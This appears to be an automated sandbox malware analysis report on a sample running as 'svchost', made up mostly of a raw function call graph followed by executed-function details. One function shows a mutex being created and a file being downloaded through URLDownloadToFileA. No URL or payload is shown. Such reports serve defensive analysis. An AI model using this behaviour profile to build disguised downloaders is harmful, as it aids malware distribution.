RtlAllocateHeap 17557->17559 17560 41bfe3 17558->17560 17559->17546 17559->17548 17559->17550 17559->17553 17559->17556 17559->17557 17559->17734 17561 41c138 17560->17561 17563 422b08 RtlAllocateHeap 17560->17563 17562 4227e3 RtlReAllocateHeap RtlAllocateHeap 17561->17562 17564 41c178 17562->17564 17565 41c04c 17563->17565 17567 401d3b RtlReAllocateHeap RtlAllocateHeap 17564->17567 17566 4227e3 RtlReAllocateHeap RtlAllocateHeap 17565->17566 17569 41c069 17566->17569 17585 41c1d6 17567->17585 17568 422b08 RtlAllocateHeap 17568->17569 17569->17561 17569->17568 17570 4227e3 RtlReAllocateHeap RtlAllocateHeap 17569->17570 17570->17569 17571 4227e3 RtlReAllocateHeap RtlAllocateHeap 17572 41c20a 17571->17572 17572->17571 17575 41c66e 17572->17575 17573 401d05 RtlReAllocateHeap RtlAllocateHeap 17573->17585 17574 42d078 RtlReAllocateHeap RtlAllocateHeap 17574->17585 17576 414e76 RtlReAllocateHeap RtlAllocateHeap 17575->17576 17578 41c6ed 17576->17578 17577 422a8d RtlReAllocateHeap RtlAllocateHeap 17577->17585 17579 411ce0 RtlReAllocateHeap RtlAllocateHeap 17578->17579 17580 41c6f1 17578->17580 17579->17580 17582 401d3b RtlReAllocateHeap RtlAllocateHeap 17580->17582 17581 40e6a8 RtlReAllocateHeap RtlAllocateHeap 17581->17585 17634 41c7f1 17582->17634 17583 422b08 RtlAllocateHeap 17583->17585 17584 406380 RtlReAllocateHeap RtlAllocateHeap 17584->17585 17585->17572 17585->17573 17585->17574 17585->17577 17585->17581 17585->17583 17585->17584 17586 41c825 17587 402c46 RtlReAllocateHeap 17586->17587 17588 41d132 17587->17588 17590 422c53 RtlReAllocateHeap 17588->17590 17588->17734 17589 401d05 RtlReAllocateHeap RtlAllocateHeap 17589->17634 17592 41d1ad 17590->17592 17591 42d078 RtlReAllocateHeap RtlAllocateHeap 17591->17634 17593 40d371 RtlReAllocateHeap RtlAllocateHeap 17592->17593 17594 41d1c9 17593->17594 17595 402c46 RtlReAllocateHeap 17594->17595 17596 41d200 17595->17596 17597 402b2c RtlReAllocateHeap 17596->17597 17599 41d22e 17597->17599 17598 422c53 RtlReAllocateHeap 17598->17634 17600 40d371 RtlReAllocateHeap RtlAllocateHeap 17599->17600 17601 41d241 17600->17601 17602 40695e RtlAllocateHeap 17601->17602 17603 41d250 17602->17603 17604 40d763 RtlReAllocateHeap RtlAllocateHeap 17603->17604 17690 41d2bc 17604->17690 17605 4020ea RtlReAllocateHeap RtlAllocateHeap 17605->17690 17606 40d02f RtlReAllocateHeap RtlAllocateHeap 17606->17634 17607 429728 RtlReAllocateHeap RtlAllocateHeap 17607->17690 17608 406654 RtlReAllocateHeap RtlAllocateHeap 17609 41dcab 17608->17609 17610 40b793 RtlReAllocateHeap RtlAllocateHeap 17609->17610 17611 41dcd2 17610->17611 17612 41dd5e 17611->17612 17616 41dcdd 17611->17616 17613 40239a RtlAllocateHeap 17612->17613 17614 41dd72 17613->17614 17615 411ce0 RtlReAllocateHeap RtlAllocateHeap 17614->17615 17618 41dd5c 17614->17618 17615->17618 17616->17614 17617 414ff7 RtlReAllocateHeap RtlAllocateHeap 17616->17617 17616->17618 17617->17616 17622 40695e RtlAllocateHeap 17618->17622 17619 406654 RtlReAllocateHeap RtlAllocateHeap 17619->17690 17620 40d111 RtlReAllocateHeap RtlAllocateHeap 17620->17634 17621 401d3b RtlReAllocateHeap RtlAllocateHeap 17621->17634 17625 41de11 17622->17625 17623 406999 RtlReAllocateHeap RtlAllocateHeap 17623->17634 17624 406b3e RtlReAllocateHeap RtlAllocateHeap 17624->17634 17626 422c53 RtlReAllocateHeap 17625->17626 17625->17734 17627 41de95 17626->17627 17629 40283c RtlReAllocateHeap 17627->17629 17628 402ca4 RtlReAllocateHeap 17628->17634 17631 41ded1 17629->17631 17630 422b08 RtlAllocateHeap 17630->17634 17633 40d371 RtlReAllocateHeap RtlAllocateHeap 17631->17633 17632 422a8d RtlReAllocateHeap RtlAllocateHeap 17632->17634 17635 41dee2 17633->17635 17634->17586 17634->17589 17634->17591 17634->17598 17634->17606 17634->17620 17634->17621 17634->17623 17634->17624 17634->17628 17634->17630 17634->17632 17639 40631e RtlReAllocateHeap RtlAllocateHeap 17634->17639 17634->17734 17636 40695e RtlAllocateHeap 17635->17636 17638 41deef 17636->17638 17637 40b896 RtlReAllocateHeap RtlAllocateHeap 17637->17690 17640 40d763 RtlReAllocateHeap RtlAllocateHeap 17638->17640 17639->17634 17642 41df31 17640->17642 17641 41dc17 17641->17608 17643 401a6e RtlReAllocateHeap RtlAllocateHeap 17642->17643 17644 41df5c 17643->17644 17646 406207 RtlAllocateHeap 17644->17646 17650 41e0f1 17644->17650 17645 422ad7 RtlAllocateHeap 17645->17690 17648 41df76 17646->17648 17647 401a6e RtlReAllocateHeap RtlAllocateHeap 17647->17648 17648->17647 17651 4066d2 RtlReAllocateHeap RtlAllocateHeap 17648->17651 17656 41e088 17648->17656 17649 4227e3 RtlReAllocateHeap RtlAllocateHeap 17649->17690 17653 402dbe RtlReAllocateHeap 17650->17653 17651->17648 17652 42281c RtlReAllocateHeap RtlAllocateHeap 17652->17690 17654 41e1aa 17653->17654 17655 40d3ad RtlReAllocateHeap RtlAllocateHeap 17654->17655 17657 41e1ba 17655->17657 17656->17650 17658 40289a RtlReAllocateHeap 17656->17658 17659 40d20f RtlReAllocateHeap RtlAllocateHeap 17657->17659 17658->17650 17661 41e1cd 17659->17661 17660 406b3e RtlReAllocateHeap RtlAllocateHeap 17660->17690 17662 402ca4 RtlReAllocateHeap 17661->17662 17665 41e276 17661->17665 17663 41e26b 17662->17663 17664 40695e RtlAllocateHeap 17663->17664 17664->17665 17666 40e782 RtlReAllocateHeap RtlAllocateHeap 17665->17666 17667 41e33a 17666->17667 17668 40283c RtlReAllocateHeap 17667->17668 17676 41e5b7 17667->17676 17669 41e393 17668->17669 17670 40d371 RtlReAllocateHeap RtlAllocateHeap 17669->17670 17671 41e3a6 17670->17671 17672 40695e RtlAllocateHeap 17671->17672 17673 41e3b3 17672->17673 17674 40d763 RtlReAllocateHeap RtlAllocateHeap 17673->17674 17677 41e3f2 17674->17677 17675 41e8d7 17678 40b793 RtlReAllocateHeap RtlAllocateHeap 17675->17678 17676->17675 17681 406bed RtlAllocateHeap 17676->17681 17676->17734 17679 4017e5 RtlReAllocateHeap RtlAllocateHeap 17677->17679 17680 41e934 17678->17680 17682 41e41d 17679->17682 17683 41e984 17680->17683 17691 41e93f 17680->17691 17698 41e744 17681->17698 17682->17676 17685 406207 RtlAllocateHeap 17682->17685 17684 40239a RtlAllocateHeap 17683->17684 17686 41e998 17684->17686 17695 41e437 17685->17695 17689 411ce0 RtlReAllocateHeap RtlAllocateHeap 17686->17689 17702 41e982 17686->17702 17687 4029b4 RtlReAllocateHeap 17687->17690 17688 414ff7 RtlReAllocateHeap RtlAllocateHeap 17688->17691 17689->17702 17690->17605 17690->17607 17690->17619 17690->17637 17690->17641 17690->17645 17690->17649 17690->17652 17690->17660 17690->17687 17692 40714c RtlReAllocateHeap RtlAllocateHeap 17690->17692 17694 40631e RtlReAllocateHeap RtlAllocateHeap 17690->17694 17691->17686 17691->17688 17696 414eed RtlReAllocateHeap RtlAllocateHeap 17691->17696 17691->17702 17692->17690 17693 4017e5 RtlReAllocateHeap RtlAllocateHeap 17693->17695 17694->17690 17695->17693 17697 4066d2 RtlReAllocateHeap RtlAllocateHeap 17695->17697 17700 41e549 17695->17700 17696->17691 17697->17695 17698->17675 17699 4228b7 RtlReAllocateHeap RtlAllocateHeap 17698->17699 17698->17734 17699->17698 17700->17676 17701 402d60 RtlReAllocateHeap 17700->17701 17701->17676 17703 422a8d RtlReAllocateHeap RtlAllocateHeap 17702->17703 17704 41eba0 17703->17704 17705 422a8d RtlReAllocateHeap RtlAllocateHeap 17704->17705 17706 41ebba 17705->17706 17707 406619 RtlReAllocateHeap RtlAllocateHeap 17706->17707 17708 41ebc4 17707->17708 17709 422a8d RtlReAllocateHeap RtlAllocateHeap 17708->17709 17710 41ebde 17709->17710 17711 406619 RtlReAllocateHeap RtlAllocateHeap 17710->17711 17712 41ebe8 17711->17712 17713 414e76 RtlReAllocateHeap RtlAllocateHeap 17712->17713 17714 41ec27 17713->17714 17715 411ce0 RtlReAllocateHeap RtlAllocateHeap 17714->17715 17716 41ec2b 17714->17716 17715->17716 17717 40e85f RtlReAllocateHeap RtlAllocateHeap 17716->17717 17735 41ec67 17716->17735 17717->17735 17718 40289a RtlReAllocateHeap 17718->17735 17719 414ff7 RtlReAllocateHeap RtlAllocateHeap 17719->17735 17720 411ce0 RtlReAllocateHeap RtlAllocateHeap 17720->17735 17721 40693f RtlAllocateHeap 17721->17735 17722 40e85f RtlReAllocateHeap RtlAllocateHeap 17722->17735 17723 41f518 17725 40695e RtlAllocateHeap 17723->17725 17724 40b6d0 RtlReAllocateHeap RtlAllocateHeap 17724->17735 17741 41f525 17725->17741 17726 414f9b RtlReAllocateHeap RtlAllocateHeap 17726->17735 17727 406511 RtlReAllocateHeap RtlAllocateHeap 17727->17735 17728 41504d RtlReAllocateHeap RtlAllocateHeap 17728->17735 17729 428076 RtlReAllocateHeap RtlAllocateHeap 17729->17741 17730 40695e RtlAllocateHeap 17730->17735 17731 40b633 RtlReAllocateHeap RtlAllocateHeap 17731->17735 17732 425b74 RtlReAllocateHeap RtlAllocateHeap 17732->17741 17733 40239a RtlAllocateHeap 17733->17735 17734->17164 17735->17718 17735->17719 17735->17720 17735->17721 17735->17722 17735->17723 17735->17724 17735->17726 17735->17727 17735->17728 17735->17730 17735->17731 17735->17733 17735->17734 17737 4228b7 RtlReAllocateHeap RtlAllocateHeap 17735->17737 17736 426a00 RtlReAllocateHeap RtlAllocateHeap 17736->17741 17737->17735 17738 402a12 RtlReAllocateHeap 17738->17741 17739 422b08 RtlAllocateHeap 17739->17741 17740 429507 RtlReAllocateHeap RtlAllocateHeap 17740->17741 17741->17729 17741->17732 17741->17734 17741->17736 17741->17738 17741->17739 17741->17740 17742 42676f RtlReAllocateHeap RtlAllocateHeap 17741->17742 17742->17741 17744 401d10 17743->17744 17745 401d37 17743->17745 17845 42ce49 17744->17845 17749 401d31 17749->17170 17888 422ad7 17750->17888 17752 422bca 17753 422c01 17752->17753 17891 42271a 17752->17891 17753->17172 17911 428d39 17755->17911 17757 429d66 17757->17174 17947 42954b 17758->17947 17760 429524 17760->17178 17950 429274 17761->17950 17763 429748 17764 42676f 2 API calls 17763->17764 17765 42977a 17763->17765 17764->17765 17765->17180 17783 40e89f 17766->17783 17768 425af4 RtlAllocateHeap 17768->17783 17769 402e40 RtlReAllocateHeap RtlAllocateHeap 17769->17783 17770 42a100 RtlReAllocateHeap RtlAllocateHeap 17770->17783 17773 40f1e4 17775 402ace RtlReAllocateHeap 17773->17775 17774 42676f RtlReAllocateHeap RtlAllocateHeap 17774->17783 17779 40f25d 17775->17779 17776 428b3f RtlReAllocateHeap RtlAllocateHeap 17776->17783 17777 425b15 RtlAllocateHeap 17777->17783 17800 40f34c 17779->17800 17982 40693f 17779->17982 17780 40f387 17780->17800 17985 40b6d0 17780->17985 17783->17768 17783->17769 17783->17770 17783->17773 17783->17774 17783->17776 17783->17777 17787 4228b7 2 API calls 17783->17787 17783->17800 17954 402ace 17783->17954 17959 4279a2 17783->17959 17975 427c3d 17783->17975 17784 40f40f 17998 40239a 17784->17998 17786 40f724 17988 40695e 17786->17988 17787->17783 17789 40f735 17790 40695e RtlAllocateHeap 17789->17790 17792 40f779 17790->17792 17791 41504d RtlReAllocateHeap RtlAllocateHeap 17802 40f457 17791->17802 17991 4021e8 17792->17991 17798 414ff7 2 API calls 17799 40f801 17798->17799 17799->17800 17801 411ce0 2 API calls 17799->17801 17800->17182 17801->17800 17802->17786 17802->17791 17802->17800 17803 40d371 2 API calls 17802->17803 17804 40695e RtlAllocateHeap 17802->17804 17805 4228b7 2 API calls 17802->17805 18001 414f9b 17802->18001 17803->17802 17804->17802 17805->17802 18141 40b793 17806->18141 17809 415021 17811 4227e3 2 API calls 17809->17811 17810 415034 17812 40239a RtlAllocateHeap 17810->17812 17813 41502f 17811->17813 17812->17813 17813->17186 17814 411ce0 17813->17814 17815 40b793 2 API calls 17814->17815 17816 411d11 17815->17816 17824 411d52 17816->17824 18144 40b76a 17816->18144 17820 411d68 17821 4021e8 2 API calls 17820->17821 17822 411d89 17821->17822 17823 4021e8 2 API calls 17822->17823 17822->17824 17823->17824 17824->17186 18150 401d3b 17825->18150 17827 40e7ab 17828 401d3b 2 API calls 17827->17828 17831 40e821 17827->17831 17829 40e7ee 17828->17829 17829->17831 18155 406b17 17829->18155 17831->17194 17833 4029f9 17832->17833 17834 402a0b 17833->17834 17835 422c53 RtlReAllocateHeap 17833->17835 17836 402a04 17835->17836 17837 402be8 17836->17837 17838 402c2d 17837->17838 17839 422c53 RtlReAllocateHeap 17838->17839 17840 402c3f 17838->17840 17841 402c38 17839->17841 17842 40d371 17841->17842 18177 40d3ad 17842->18177 17844 40d38a 17854 42822e 17845->17854 17847 42ce5d 17858 425b31 17847->17858 17849 401d29 17850 42ce79 17849->17850 17851 42ce8c 17850->17851 17852 42cea6 17850->17852 17851->17852 17853 420390 RtlReAllocateHeap 17851->17853 17852->17749 17853->17852 17855 428238 17854->17855 17857 42824b 17855->17857 17861 425b15 17855->17861 17857->17847 17869 425b74 17858->17869 17860 425b4f 17860->17849 17862 425b1f 17861->17862 17864 425b28 17861->17864 17865 42a86d 17862->17865 17864->17857 17866 42a879 17865->17866 17868 42a889 17865->17868 17867 42a887 RtlAllocateHeap 17866->17867 17867->17868 17868->17864 17870 425b8d 17869->17870 17871 425bd6 17869->17871 17870->17871 17873 4228b7 17870->17873 17871->17860 17874 4228f2 17873->17874 17876 4228c8 17873->17876 17874->17871 17875 422906 17880 42292b 17875->17880 17876->17874 17876->17875 17878 4228e5 17876->17878 17884 420390 17878->17884 17881 422939 17880->17881 17883 42293f 17880->17883 17882 42a86d RtlAllocateHeap 17881->17882 17881->17883 17882->17883 17883->17874 17885 4203a3 17884->17885 17887 4203b4 17884->17887 17886 4203b2 RtlReAllocateHeap 17885->17886 17886->17887 17887->17874 17897 422994 17888->17897 17890 422ae6 17890->17752 17892 42274e 17891->17892 17893 42272c 17891->17893 17904 4227e3 17892->17904 17896 42273e 17893->17896 17901 42281c 17893->17901 17896->17752 17898 42299c 17897->17898 17900 4229aa 17897->17900 17899 42292b RtlAllocateHeap 17898->17899 17899->17900 17900->17890 17907 42282d 17901->17907 17903 42282a 17903->17896 17905 42281c 2 API calls 17904->17905 17906 4227fb 17905->17906 17906->17896 17908 422846 17907->17908 17910 422885 17907->17910 17909 4228b7 2 API calls 17908->17909 17908->17910 17909->17910 17910->17903 17912 428d5f 17911->17912 17914 428dff 17912->17914 17922 428215 17912->17922 17915 428e67 17914->17915 17916 428e3b 17914->17916 17932 4281ed 17915->17932 17925 42676f 17916->17925 17919 428d8e 17919->17914 17921 425b74 2 API calls 17919->17921 17920 428e50 17920->17757 17921->17919 17923 42822e RtlAllocateHeap 17922->17923 17924 428222 17923->17924 17924->17919 17936 422a8d 17925->17936 17929 426798 17944 4267cf 17929->17944 17933 4281fb 17932->17933 17934 428205 17932->17934 17935 425b74 2 API calls 17933->17935 17934->17920 17935->17934 17937 422ad7 RtlAllocateHeap 17936->17937 17938 422aa1 17937->17938 17939 4227e3 2 API calls 17938->17939 17940 422aad 17939->17940 17941 425af4 17940->17941 17942 425b15 RtlAllocateHeap 17941->17942 17943 425b02 17942->17943 17943->17929 17945 425af4 RtlAllocateHeap 17944->17945 17946 4267b5 17945->17946 17946->17920 17948 428d39 2 API calls 17947->17948 17949 429563 17948->17949 17949->17760 17952 42928e 17950->17952 17951 42281c 2 API calls 17951->17952 17952->17951 17953 4292f2 17952->17953 17953->17763 17955 402b13 17954->17955 17956 402b25 17955->17956 18009 422c53 17955->18009 17958 402b1e 17958->17783 17963 4279bd 17959->17963 17967 4279b5 17959->17967 17960 427b7f 18030 428717 17960->18030 17962 427e4c RtlReAllocateHeap RtlAllocateHeap 17962->17963 17963->17960 17963->17962 17964 427fe3 RtlReAllocateHeap RtlAllocateHeap 17963->17964 17963->17967 18013 427ff3 17963->18013 18018 428076 17963->18018 18021 428047 17963->18021 18025 428035 17963->18025 17964->17963 17965 428035 2 API calls 17968 427b89 17965->17968 17966 427ff3 2 API calls 17966->17968 17967->17783 17968->17965 17968->17966 17968->17967 17971 428047 2 API calls 17968->17971 17972 428076 2 API calls 17968->17972 17971->17968 17972->17968 18115 4272f2 17975->18115 17978 4227e3 2 API calls 17979 427c67 17978->17979 18118 427c93 17979->18118 17981 427c72 17981->17783 17983 422994 RtlAllocateHeap 17982->17983 17984 406952 17983->17984 17984->17780 18126 406c30 17985->18126 18134 406bed 17988->18134 17990 40696c 17990->17789 17993 402202 17991->17993 17992 402282 17992->17800 17995 422c41 17992->17995 17993->17992 17994 42676f 2 API calls 17993->17994 17994->17992 17996 422a8d 2 API calls 17995->17996 17997 40f7e6 17996->17997 17997->17798 17999 40695e RtlAllocateHeap 17998->17999 18000 4023af 17999->18000 18000->17800 18138 40b633 18001->18138 18004 414fb7 18006 40239a RtlAllocateHeap 18004->18006 18005 414fd8 18007 40695e RtlAllocateHeap 18005->18007 18008 414fc9 18006->18008 18007->18008 18008->17802 18010 422c78 18009->18010 18011 422c62 18009->18011 18010->17958 18011->18010 18012 420390 RtlReAllocateHeap 18011->18012 18012->18010 18046 4284b4 18013->18046 18015 428003 18054 428351 18015->18054 18019 42809a 2 API calls 18018->18019 18020 428088 18019->18020 18020->17963 18022 42805b 18021->18022 18023 428054 18021->18023 18024 428351 2 API calls 18023->18024 18024->18022 18026 428045 18025->18026 18027 42803f 18025->18027 18026->17963 18028 4282ad 2 API calls 18027->18028 18029 428651 18028->18029 18029->17963 18031 42886a 18030->18031 18032 42872f 18030->18032 18031->17968 18032->18031 18033 425af4 RtlAllocateHeap 18032->18033 18034 428762 18033->18034 18035 4284b4 2 API calls 18034->18035 18036 42876e 18035->18036 18037 4287d2 18036->18037 18038 428779 18036->18038 18113 428264 18037->18113 18040 425af4 RtlAllocateHeap 18038->18040 18043 428788 18038->18043 18040->18043 18041 428264 2 API calls 18042 4287dc 18041->18042 18042->17968 18043->18031 18044 4228b7 2 API calls 18043->18044 18045 42882d 18043->18045 18044->18045 18045->18031 18045->18041 18058 4282ad 18046->18058 18049 4284c4 18052 428076 2 API calls 18049->18052 18053 4284e3 18049->18053 18050 4284ea 18062 4282e7 18050->18062 18052->18053 18053->18015 18055 428361 18054->18055 18056 428008 18054->18056 18083 42836a 18055->18083 18056->17963 18059 4282cf 18058->18059 18060 4282bb 18058->18060 18059->18049 18059->18050 18060->18059 18066 42809a 18060->18066 18063 4282f4 18062->18063 18065 428301 18062->18065 18064 425af4 RtlAllocateHeap 18063->18064 18064->18065 18065->18053 18077 42812d 18066->18077 18069 4281ed 2 API calls 18070 4280d0 18069->18070 18071 427c3d 2 API calls 18070->18071 18072 4280dd 18071->18072 18073 4280e3 18072->18073 18074 428215 RtlAllocateHeap 18072->18074 18073->18059 18075 428165 18074->18075 18075->18073 18076 425b74 2 API calls 18075->18076 18076->18075 18078 428141 18077->18078 18079 428215 RtlAllocateHeap 18078->18079 18081 4280c9 18078->18081 18080 428165 18079->18080 18080->18081 18082 425b74 2 API calls 18080->18082 18081->18069 18082->18080 18086 428385 18083->18086 18085 428372 18085->18056 18095 4283ed 18086->18095 18088 428393 18089 4283d7 18088->18089 18090 4283ed 2 API calls 18088->18090 18089->18085 18091 4283a9 18090->18091 18091->18089 18092 425af4 RtlAllocateHeap 18091->18092 18093 4283bf 18092->18093 18098 4283fd 18093->18098 18101 428412 18095->18101 18097 4283f5 18097->18088 18099 428412 2 API calls 18098->18099 18100 428408 18099->18100 18100->18089 18102 428480 18101->18102 18103 428421 18101->18103 18102->18097 18104 4284b4 RtlReAllocateHeap RtlAllocateHeap 18103->18104 18107 42842d 18104->18107 18105 428476 18106 428264 RtlReAllocateHeap RtlAllocateHeap 18105->18106 18106->18102 18107->18105 18108 42848a 18107->18108 18109 428451 18107->18109 18111 425af4 RtlAllocateHeap 18107->18111 18110 428512 RtlReAllocateHeap RtlAllocateHeap 18108->18110 18109->18105 18109->18108 18112 4284b2 18110->18112 18111->18109 18114 4282ad 2 API calls 18113->18114 18116 422994 RtlAllocateHeap 18115->18116 18117 427301 18116->18117 18117->17978 18119 427cac 18118->18119 18120 427d16 18119->18120 18123 427cb1 18119->18123 18125 4228b7 2 API calls 18119->18125 18121 42281c 2 API calls 18120->18121 18120->18123 18124 427d3c 18120->18124 18121->18124 18122 422c53 RtlReAllocateHeap 18122->18123 18123->17981 18124->18122 18125->18120 18127 406c4b 18126->18127 18129 406c56 18127->18129 18130 4022e8 18127->18130 18129->17784 18129->17802 18131 4022fb 18130->18131 18133 40230a 18130->18133 18132 42676f 2 API calls 18131->18132 18132->18133 18133->18129 18135 406c00 18134->18135 18136 406bf7 18134->18136 18135->17990 18137 42a86d RtlAllocateHeap 18136->18137 18137->18135 18139 406c30 2 API calls 18138->18139 18140 40b655 18139->18140 18140->18004 18140->18005 18142 4227e3 2 API calls 18141->18142 18143 40b7b3 18142->18143 18143->17809 18143->17810 18145 4227e3 2 API calls 18144->18145 18146 40b788 18145->18146 18146->17824 18147 406619 18146->18147 18148 42281c 2 API calls 18147->18148 18149 406633 18148->18149 18149->17820 18151 42812d 2 API calls 18150->18151 18152 401d64 18151->18152 18154 401d92 18152->18154 18158 42d0aa 18152->18158 18154->17827 18171 42cefd 18155->18171 18159 42d0c3 18158->18159 18160 42d0d6 18159->18160 18164 42d0f2 18159->18164 18168 42d043 18160->18168 18165 42d100 18164->18165 18166 42d10a 18164->18166 18167 425b74 2 API calls 18165->18167 18166->18160 18167->18166 18169 42ce79 RtlReAllocateHeap 18168->18169 18170 42d061 18169->18170 18170->18154 18172 42281c 2 API calls 18171->18172 18174 42cf37 18172->18174 18173 406b38 18173->17831 18174->18173 18175 42281c 2 API calls 18174->18175 18176 4227e3 2 API calls 18174->18176 18175->18174 18176->18174 18178 40d3e9 18177->18178 18179 40d402 18178->18179 18181 40d727 18178->18181 18182 4228b7 2 API calls 18178->18182 18180 422c41 2 API calls 18179->18180 18187 40d4e5 18180->18187 18181->17844 18182->18178 18183 428d39 2 API calls 18183->18187 18184 425b74 2 API calls 18184->18187 18187->18181 18187->18183 18187->18184 18188 426a00 18187->18188 18193 40613b 18187->18193 18189 4272f2 RtlAllocateHeap 18188->18189 18192 426a1d 18189->18192 18190 426a5a 18190->18187 18192->18190 18199 42730d 18192->18199 18198 406174 18193->18198 18194 4061ce 18195 4227e3 2 API calls 18194->18195 18197 4061e3 18195->18197 18196 4227e3 RtlReAllocateHeap RtlAllocateHeap 18196->18198 18197->18187 18198->18194 18198->18196 18200 427324 18199->18200 18201 4227e3 2 API calls 18200->18201 18202 427332 18201->18202 18202->18192

                                                  Executed Functions

                                                  Function 00415800, Relevance: 69.8, APIs: 2, Strings: 32, Instructions: 10256filesynchronizationnetworkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateMutexA.KERNELBASE(00000000,00000001,?), ref: 004158C6
                                                  • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 00415C3C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2133065306.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                                  Similarity
                                                  • API ID: CreateDownloadFileMutex
                                                  • String ID: wC$$zC$$}C$$~C$,wC$,}C$0~C$8wC$<vC$<vC$@$@pC$@pC$@pC$@pC$@pC$@pC$@pC$@pC$DyC$LvC$TqC$TyC$XvC$\xC$\xC$\xC$\}C$dvC$d}C$p@D$xqC
                                                  • API String ID: 2836258396-1495465107
                                                  • Opcode ID: eb156ac7ec4e0aefba1d104138bdfd6374e412e2dcfc7611adf2ae9eab0656e9
                                                  • Instruction ID: 3eab1be84b858212c2b712eb9ecab3bf2646d5897512f5f08c00c1dba6ecace8
                                                  • Opcode Fuzzy Hash: eb156ac7ec4e0aefba1d104138bdfd6374e412e2dcfc7611adf2ae9eab0656e9
                                                  • Instruction Fuzzy Hash: 6E244C716087818BD335DF24C891BDBB7E5FFC9304F10492EE48A9B291DB78A945CB86
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040115C, Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 3864 40115c-40117a 3865 401430-401439 3864->3865 3866 401180-401191 3864->3866 3875 401441-40145f call 434dfc 3865->3875 3867 4011a7-4011b3 3866->3867 3869 401193-401195 3867->3869 3870 4011b5-4011bf 3867->3870 3871 4013d0-4013dd 3869->3871 3872 40119b-4011a4 3869->3872 3873 4013e3-4013f7 call 434e0c 3870->3873 3874 4011c5-4011cc 3870->3874 3871->3873 3871->3874 3872->3867 3881 4011ea-4011ec 3873->3881 3882 4013fd-40141d call 434dfc 3873->3882 3874->3875 3876 4011d2-4011e4 3874->3876 3891 401464 3875->3891 3876->3881 3876->3882 3883 4011f2-4011f9 3881->3883 3884 401423-401429 3881->3884 3882->3883 3882->3884 3887 401217 call 4353c0 3883->3887 3888 4011fb-401214 3883->3888 3884->3883 3893 40121c-401238 SetUnhandledExceptionFilter call 434e50 3887->3893 3888->3887 3895 40146c-40146f call 434dec 3891->3895 3897 40123d-401257 call 435240 call 434e24 3893->3897 3898 401474-40147a 3895->3898 3903 401271-401277 3897->3903 3904 401259 3897->3904 3905 401260-401262 3903->3905 3906 401279-401284 3903->3906 3907 4012b4-4012bc 3904->3907 3909 401290-401292 3905->3909 3910 401264-401267 3905->3910 3908 40126e 3906->3908 3911 4012d2-4012f2 call 434de4 3907->3911 3912 4012be-4012c7 3907->3912 3908->3903 3916 401294 3909->3916 3917 4012a5-4012ad 3909->3917 3910->3909 3918 401269 3910->3918 3911->3891 3922 4012f8-401309 3911->3922 3913 4013c0-4013c4 3912->3913 3914 4012cd 3912->3914 3913->3914 3914->3911 3920 4012af 3916->3920 3917->3920 3921 4012a0-4012a3 3917->3921 3918->3908 3920->3907 3921->3917 3921->3920 3923 401310-401344 call 434dbc call 434de4 call 434dd4 3922->3923 3930 401346-40135a call 434ef0 3923->3930 3932 40135f-401386 call 435e80 3930->3932 3934 40138b-401398 3932->3934 3934->3895 3935 40139e-4013a6 3934->3935 3936 4013b2-4013bd 3935->3936 3937 4013a8-4013ad call 434e04 3935->3937 3937->3936
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 00401223
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2133065306.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: 854dcdc4280b8f2bbf386967df07d2ab6d598209781f5a3c52be75b235f8de86
                                                  • Instruction ID: 6637b0886fb05ed50bbf3230547d5b9ae6dc46fa2eb97121aa624c758af38a7b
                                                  • Opcode Fuzzy Hash: 854dcdc4280b8f2bbf386967df07d2ab6d598209781f5a3c52be75b235f8de86
                                                  • Instruction Fuzzy Hash: 2671B075A043008FDB14DFA5E88179A77F0FB89704F51843EE944AB3A1D77DA844CB9A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401150, Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 3940 401150-40117a 3942 401430-401439 3940->3942 3943 401180-401191 3940->3943 3952 401441-40145f call 434dfc 3942->3952 3944 4011a7-4011b3 3943->3944 3946 401193-401195 3944->3946 3947 4011b5-4011bf 3944->3947 3948 4013d0-4013dd 3946->3948 3949 40119b-4011a4 3946->3949 3950 4013e3-4013f7 call 434e0c 3947->3950 3951 4011c5-4011cc 3947->3951 3948->3950 3948->3951 3949->3944 3958 4011ea-4011ec 3950->3958 3959 4013fd-40141d call 434dfc 3950->3959 3951->3952 3953 4011d2-4011e4 3951->3953 3968 401464 3952->3968 3953->3958 3953->3959 3960 4011f2-4011f9 3958->3960 3961 401423-401429 3958->3961 3959->3960 3959->3961 3964 401217 call 4353c0 3960->3964 3965 4011fb-401214 3960->3965 3961->3960 3970 40121c-401238 SetUnhandledExceptionFilter call 434e50 3964->3970 3965->3964 3972 40146c-40146f call 434dec 3968->3972 3974 40123d-401257 call 435240 call 434e24 3970->3974 3975 401474-40147a 3972->3975 3980 401271-401277 3974->3980 3981 401259 3974->3981 3982 401260-401262 3980->3982 3983 401279-401284 3980->3983 3984 4012b4-4012bc 3981->3984 3986 401290-401292 3982->3986 3987 401264-401267 3982->3987 3985 40126e 3983->3985 3988 4012d2-4012f2 call 434de4 3984->3988 3989 4012be-4012c7 3984->3989 3985->3980 3993 401294 3986->3993 3994 4012a5-4012ad 3986->3994 3987->3986 3995 401269 3987->3995 3988->3968 3999 4012f8-401309 3988->3999 3990 4013c0-4013c4 3989->3990 3991 4012cd 3989->3991 3990->3991 3991->3988 3997 4012af 3993->3997 3994->3997 3998 4012a0-4012a3 3994->3998 3995->3985 3997->3984 3998->3994 3998->3997 4000 401310-401344 call 434dbc call 434de4 call 434dd4 3999->4000 4007 401346-40135a call 434ef0 